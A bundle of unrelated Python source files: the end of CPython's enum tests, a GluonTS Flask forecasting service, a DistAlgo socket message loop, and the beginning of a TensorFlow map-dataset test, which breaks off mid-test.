self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = IntFlag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = IntFlag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_empty_list(self):
Perm = enum.IntFlag('Perm', [])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', [])
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_programatic_function_from_empty_tuple(self):
Perm = enum.IntFlag('Perm', ())
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', ())
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertFalse(Color.GREEN in Open)
self.assertFalse(Open.RW in Color)
with self.assertRaises(TypeError):
'GREEN' in Color
with self.assertRaises(TypeError):
'RW' in Open
with self.assertRaises(TypeError):
2 in Color
with self.assertRaises(TypeError):
2 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
with self.assertRaises(TypeError):
self.assertFalse('test' in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.BLACK), [])
self.assertEqual(list(Color.PURPLE), [Color.RED, Color.BLUE])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
def test_member_length(self):
self.assertEqual(self.Color.__len__(self.Color.BLACK), 0)
self.assertEqual(self.Color.__len__(self.Color.GREEN), 1)
self.assertEqual(self.Color.__len__(self.Color.PURPLE), 2)
self.assertEqual(self.Color.__len__(self.Color.BLANCO), 3)
def test_aliases(self):
Color = self.Color
self.assertEqual(Color(1).name, 'RED')
self.assertEqual(Color['ROJO'].name, 'RED')
self.assertEqual(Color(7).name, 'WHITE')
self.assertEqual(Color['BLANCO'].name, 'WHITE')
self.assertIs(Color.BLANCO, Color.WHITE)
Open = self.Open
self.assertIs(Open['AC'], Open.AC)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_bizarre(self):
with self.assertRaisesRegex(TypeError, "invalid Flag 'Bizarre' -- missing values: 1, 2"):
class Bizarre(IntFlag):
b = 3
c = 4
d = 6
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(AllMixin, StrMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(IntFlag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestEmptyAndNonLatinStrings(unittest.TestCase):
def test_empty_string(self):
with self.assertRaises(ValueError):
empty_abc = Enum('empty_abc', ('', 'B', 'C'))
def test_non_latin_character_string(self):
greek_abc = Enum('greek_abc', ('\u03B1', 'B', 'C'))
item = getattr(greek_abc, '\u03B1')
self.assertEqual(item.value, 1)
def test_non_latin_number_string(self):
hebrew_123 = Enum('hebrew_123', ('\u05D0', '2', '3'))
item = getattr(hebrew_123, '\u05D0')
self.assertEqual(item.value, 1)
class TestUnique(unittest.TestCase):
def test_unique_clean(self):
@unique
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
@unique
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@unique
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@unique
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@unique
class Silly(Enum):
one = 1
two = 'dos'
name = 3
@unique
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
class TestHelpers(unittest.TestCase):
sunder_names = '_bad_', '_good_', '_what_ho_'
dunder_names = '__mal__', '__bien__', '__que_que__'
private_names = '_MyEnum__private', '_MyEnum__still_private'
private_and_sunder_names = '_MyEnum__private_', '_MyEnum__also_private_'
random_names = 'okay', '_semi_private', '_weird__', '_MyEnum__'
def test_sunder(self):
for name in self.sunder_names + self.private_and_sunder_names:
self.assertTrue(enum._is_sunder(name), '%r is a not sunder name?' % name)
for name in self.dunder_names + self.private_names + self.random_names:
self.assertFalse(enum._is_sunder(name), '%r is a sunder name?' % name)
def test_dunder(self):
for name in self.dunder_names:
self.assertTrue(enum._is_dunder(name), '%r is a not dunder name?' % name)
for name in self.sunder_names + self.private_names + self.private_and_sunder_names + self.random_names:
self.assertFalse(enum._is_dunder(name), '%r is a dunder name?' % name)
def test_is_private(self):
for name in self.private_names + self.private_and_sunder_names:
self.assertTrue(enum._is_private('MyEnum', name), '%r is a not private name?')
for name in self.sunder_names + self.dunder_names + self.random_names:
self.assertFalse(enum._is_private('MyEnum', name), '%r is a private name?')
class TestEnumTypeSubclassing(unittest.TestCase):
pass
expected_help_output_with_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1, boundary=None)
|\x20\x20
| An enumeration.
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = Color.blue
|\x20\x20
| green = Color.green
|\x20\x20
| red = Color.red
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
| The name of the Enum member.
|\x20\x20
| value
| The value of the Enum member.
|\x20\x20
| ----------------------------------------------------------------------
| Readonly properties inherited from enum.EnumType:
|\x20\x20
| __members__
| Returns a mapping of member name->value.
|\x20\x20\x20\x20\x20\x20
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping."""
expected_help_output_without_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = Color.blue
|\x20\x20
| green = Color.green
|\x20\x20
| red = Color.red
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
|\x20\x20
| value
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumType:
|\x20\x20
| __members__"""
class TestStdLib(unittest.TestCase):
maxDiff = None
class Color(Enum):
red = 1
green = 2
blue = 3
def test_pydoc(self):
# indirectly test __objclass__
if StrEnum.__doc__ is None:
expected_text = expected_help_output_without_docs % __name__
else:
expected_text = expected_help_output_with_docs % __name__
output = StringIO()
helper = pydoc.Helper(output=output)
helper(self.Color)
result = output.getvalue().strip()
self.assertEqual(result, expected_text)
def test_inspect_getmembers(self):
values = dict((
('__class__', EnumType),
('__doc__', 'An enumeration.'),
('__members__', self.Color.__members__),
('__module__', __name__),
('blue', self.Color.blue),
('green', self.Color.green),
('name', Enum.__dict__['name']),
('red', self.Color.red),
('value', Enum.__dict__['value']),
))
result = dict(inspect.getmembers(self.Color))
self.assertEqual(set(values.keys()), set(result.keys()))
failed = False
for k in values.keys():
if result[k] != values[k]:
print()
print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' %
('=' * 75, k, result[k], values[k], '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_inspect_classify_class_attrs(self):
# indirectly test __objclass__
from inspect import Attribute
values = [
Attribute(name='__class__', kind='data',
defining_class=object, object=EnumType),
Attribute(name='__doc__', kind='data',
defining_class=self.Color, object='An enumeration.'),
Attribute(name='__members__', kind='property',
defining_class=EnumType, object=EnumType.__members__),
Attribute(name='__module__', kind='data',
defining_class=self.Color, object=__name__),
Attribute(name='blue', kind='data',
defining_class=self.Color, object=self.Color.blue),
Attribute(name='green', kind='data',
defining_class=self.Color, object=self.Color.green),
Attribute(name='red', kind='data',
defining_class=self.Color, object=self.Color.red),
Attribute(name='name', kind='data',
defining_class=Enum, object=Enum.__dict__['name']),
Attribute(name='value', kind='data',
defining_class=Enum, object=Enum.__dict__['value']),
]
values.sort(key=lambda item: item.name)
result = list(inspect.classify_class_attrs(self.Color))
result.sort(key=lambda item: item.name)
self.assertEqual(
len(values), len(result),
"%s != %s" % ([a.name for a in values], [a.name for a in result])
)
failed = False
for v, r in zip(values, result):
if r != v:
print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, enum, not_exported={'bin'})
# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5 # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5
class TestIntEnumConvert(unittest.TestCase):
def test_convert_value_lookup_priority(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# We don't want the reverse lookup value to vary when there are
# multiple possible names for a given value. It should always
# report the first lexigraphical name in that case.
self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')
def test_convert(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_TEST_NAME_F,
test_type.CONVERT_TEST_NAME_A)
self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_TEST_* found.')
@unittest.skipUnless(sys.version_info[:2] == (3, 8),
'_convert was deprecated in 3.8')
def test_convert_warn(self):
with self.assertWarns(DeprecationWarning):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
@unittest.skipUnless(sys.version_info >= (3, 9),
'_convert was removed in 3.9')
def test_convert_raise(self):
with self.assertRaises(AttributeError):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
def test_convert_repr_and_str(self):
module = ('test.test_enum', '__main__')[__name__=='__main__']
test_type = enum.IntEnum._convert_(
'UnittestConvert',
module,
filter=lambda x: x.startswith('CONVERT_TEST_'))
self.assertEqual(repr(test_type.CONVERT_TEST_NAME_A), '%s.CONVERT_TEST_NAME_A' % module)
self.assertEqual(str(test_type.CONVERT_TEST_NAME_A), 'CONVERT_TEST_NAME_A')
self.assertEqual(format(test_type.CONVERT_TEST_NAME_A), '5')
# global names for StrEnum._convert_ test
CONVERT_STR_TEST_2 = 'goodbye'
CONVERT_STR_TEST_1 = 'hello'
class TestStrEnumConvert(unittest.TestCase):
def test_convert(self):
test_type = enum.StrEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_STR_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_STR_TEST_1, 'hello')
self.assertEqual(test_type.CONVERT_STR_TEST_2, 'goodbye')
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_STR_* found.')
def test_convert_repr_and_str(self):
module = ('test.test_enum', '__main__')[__name__=='__main__']
test_type = enum.StrEnum._convert_(
'UnittestConvert',
module,
filter=lambda x: x.startswith('CONVERT_STR_'))
self.assertEqual(repr(test_type.CONVERT_STR_TEST_1), '%s.CONVERT_STR_TEST_1' % module)
self.assertEqual(str(test_type.CONVERT_STR_TEST_2), 'goodbye')
self.assertEqual(format(test_type.CONVERT_STR_TEST_1), 'hello')
if __name__ == '__main__':
unittest.main()
|
app.py
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import json
import logging
import os
import signal
import time
import traceback
import multiprocessing as mp
from queue import Empty as QueueEmpty
from typing import Callable, Iterable, List, Tuple
from flask import Flask, Response, jsonify, request
from pydantic import BaseModel
from gluonts.dataset.common import ListDataset
from gluonts.model.forecast import Config as ForecastConfig
from gluonts.shell.util import forecaster_type_by_name
from .util import jsonify_floats
logger = logging.getLogger("gluonts.serve")
class InferenceRequest(BaseModel):
instances: list
configuration: ForecastConfig
class ThrougputIter:
def __init__(self, iterable: Iterable) -> None:
self.iter = iter(iterable)
self.timings: List[float] = []
def __iter__(self):
try:
while True:
start = time.time()
element = next(self.iter)
self.timings.append(time.time() - start)
yield element
except StopIteration:
return None
def log_throughput(instances, timings):
item_lengths = [len(item["target"]) for item in instances]
if timings:
total_time = sum(timings)
avg_time = total_time / len(timings)
logger.info(
"Inference took "
f"{total_time:.2f}s for {len(timings)} items, "
f"{avg_time:.2f}s on average."
)
for idx, (duration, input_length) in enumerate(
zip(timings, item_lengths), start=1
):
logger.info(
f"\t{idx} took -> {duration:.2f}s (len(target)=={input_length})."
)
else:
logger.info(
"No items were provided for inference. No throughput to log."
)
def get_base_app(execution_params):
app = Flask("GluonTS scoring service")
@app.errorhandler(Exception)
def handle_error(error) -> Tuple[str, int]:
return traceback.format_exc(), 500
@app.route("/ping")
def ping() -> str:
return ""
@app.route("/execution-parameters")
def execution_parameters() -> Response:
return jsonify(execution_params)
return app
def handle_predictions(predictor, instances, configuration):
# create the forecasts
forecasts = ThrougputIter(
predictor.predict(
ListDataset(instances, predictor.freq),
num_samples=configuration.num_samples,
)
)
predictions = [
forecast.as_json_dict(configuration) for forecast in forecasts
]
log_throughput(instances, forecasts.timings)
return predictions
def inference_invocations(predictor_factory) -> Callable[[], Response]:
def invocations() -> Response:
predictor = predictor_factory(request.json)
req = InferenceRequest.parse_obj(request.json)
predictions = handle_predictions(
predictor, req.instances, req.configuration
)
return jsonify(predictions=jsonify_floats(predictions))
return invocations
def do(fn, args, queue):
queue.put(fn(*args))
def with_timeout(fn, args, timeout):
queue = mp.Queue()
process = mp.Process(target=do, args=(fn, args, queue))
process.start()
try:
return queue.get(True, timeout=timeout)
except QueueEmpty:
os.kill(process.pid, signal.SIGKILL)
return None
def make_predictions(predictor, dataset, configuration):
DEBUG = configuration.dict().get("DEBUG")
# we have to take this as the initial start-time since the first
# forecast is produced before the loop in predictor.predict
start = time.time()
predictions = []
forecast_iter = predictor.predict(
dataset, num_samples=configuration.num_samples,
)
for forecast in forecast_iter:
end = time.time()
prediction = forecast.as_json_dict(configuration)
if DEBUG:
prediction["debug"] = {"timing": end - start}
predictions.append(prediction)
start = time.time()
return predictions
def batch_inference_invocations(
predictor_factory, configuration, settings
) -> Callable[[], Response]:
predictor = predictor_factory({"configuration": configuration.dict()})
scored_instances = []
last_scored = [time.time()]
def invocations() -> Response:
request_data = request.data.decode("utf8").strip()
# request_data can be empty, but .split() will produce a non-empty
# list, which then means we try to decode an empty string, which
# causes an error: `''.split() == ['']`
if request_data:
instances = list(map(json.loads, request_data.split("\n")))
else:
instances = []
dataset = ListDataset(instances, predictor.freq)
if settings.gluonts_batch_timeout > 0:
predictions = with_timeout(
make_predictions,
args=(predictor, dataset, configuration),
timeout=settings.gluonts_batch_timeout,
)
# predictions are None, when predictor timed out
if predictions is None:
logger.warning(f"predictor timed out for: {request_data}")
FallbackPredictor = forecaster_type_by_name(
settings.gluonts_batch_fallback_predictor
)
fallback_predictor = FallbackPredictor(
freq=predictor.freq,
prediction_length=predictor.prediction_length,
)
predictions = make_predictions(
fallback_predictor, dataset, configuration
)
else:
predictions = make_predictions(predictor, dataset, configuration)
scored_instances.append(len(predictions))
N = 60
diff = time.time() - last_scored[0]
if diff > N:
logger.info(
f"Worker {os.getpid()} Scored {sum(scored_instances)} in last "
f"{int(diff)} seconds."
)
scored_instances.clear()
last_scored[0] = time.time()
lines = list(map(json.dumps, map(jsonify_floats, predictions)))
return Response("\n".join(lines), mimetype="application/jsonlines")
return invocations
def make_app(
predictor_factory, execution_params, batch_transform_config, settings
):
app = get_base_app(execution_params)
if batch_transform_config is not None:
invocations_fn = batch_inference_invocations(
predictor_factory, batch_transform_config, settings
)
else:
invocations_fn = inference_invocations(predictor_factory)
app.route("/invocations", methods=["POST"])(invocations_fn)
return app
|
mesgloop.py
|
# Copyright (c) 2010-2017 Bo Lin
# Copyright (c) 2010-2017 Yanhong Annie Liu
# Copyright (c) 2010-2017 Stony Brook University
# Copyright (c) 2010-2017 The Research Foundation of SUNY
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import logging
import socket
import selectors
import threading
__all__ = ["SelectorLoop"]
logger = logging.getLogger(__name__)
RECV_BUF_SIZE = 32
class TerminateLoop(Exception): pass
class SelectorLoop(object):
"""Wrapper around a Selector object providing a background message loop.
"""
def __init__(self, selectorcls=selectors.DefaultSelector):
super().__init__()
# Multiplexer for all sockets:
self.selector = selectorcls()
# Class logger instance:
self._log = logger.getChild(self.__class__.__name__)
# A dummy socket pair for waking up the message-loop:
self.notifier, self.event = None, None
# Background thread:
self.worker = None
def _handle_event(self, sock, _):
# Just drain the event socket buffer:
data = sock.recv(RECV_BUF_SIZE)
if not data:
raise TerminateLoop()
def __len__(self):
"""Returns the number of registered callbacks."""
reg = self.selector.get_map()
if self.event and self.event in reg:
return len(reg) - 1
else:
return len(reg)
def register(self, conn, callback, data=None):
"""Registers a new connection object.
"""
try:
self.selector.register(conn, selectors.EVENT_READ, (callback, data))
self.notify()
except ValueError as e:
# The conn object was already closed, so call the callback to
# trigger any cleanup routines from the caller
self._log.debug("Registering invalid connection %s: %r",
conn, e, exc_info=1)
callback(conn, data)
def deregister(self, conn):
try:
self.selector.unregister(conn)
# No need to wake the main loop here
except (KeyError, ValueError):
pass
def notify(self):
"""Wake the main message loop."""
if self.notifier:
try:
self.notifier.send(b'x')
except (AttributeError, OSError):
# socket already closed, just ignore
pass
def is_alive(self):
return self.worker is not None and self.worker.is_alive()
def start(self):
"""Starts the message loop thread."""
if self.worker is None:
self.worker = threading.Thread(target=self.run, daemon=True)
self.worker.start()
def stop(self):
"""Stops the message loop thread."""
if self.notifier:
try:
self.notifier.close()
except (AttributeError, OSError):
pass
def run(self):
try:
self.notifier, self.event = socket.socketpair()
self.selector.register(self.event, selectors.EVENT_READ,
(self._handle_event, None))
while True:
events = self.selector.select()
for key, _ in events:
callback, aux = key.data
try:
callback(key.fileobj, aux)
except socket.error as e:
if key.fileobj is self.event:
self._log.error("Notifier socket failed: %r", e)
break
else:
self._log.debug(
"socket.error when receiving from %s: %r",
key, e, exc_info=1)
self.deregister(key.fileobj)
except TerminateLoop:
pass
except Exception as e:
self._log.error("Message loop terminated abnormally: %r", e)
self._log.debug("Uncaught exception %r", e, exc_info=1)
finally:
if self.notifier:
try:
self.notifier.close()
except OSError:
pass
if self.event:
self.deregister(self.event)
try:
self.event.close()
except OSError:
pass
self.notifier, self.event = None, None
self.worker = None
|
map_dataset_op_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the experimental input pipeline ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import os
import threading
import numpy as np
from tensorflow.contrib.data.python.kernel_tests import dataset_serialization_test_base
from tensorflow.contrib.data.python.ops import dataset_ops
from tensorflow.contrib.data.python.ops import error_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import io_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class MapDatasetTest(test.TestCase):
def _buildMapDataset(self, components, count):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(_map_fn)
.repeat(count))
def testMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildMapDataset(components, count)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={count: 14})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={count: 18})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
def _buildParallelMapDataset(self, components, count, num_threads,
output_buffer_size):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn, num_threads=num_threads, output_buffer_size=output_buffer_size)
.repeat(count))
def testParallelMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
num_threads = array_ops.placeholder(dtypes.int32, shape=[])
output_buffer_size = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildParallelMapDataset(components, count, num_threads,
output_buffer_size)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
def do_test(num_threads_val, output_buffer_size_val):
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={
count: 14,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={
count: 18,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread)
for _ in range(64)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
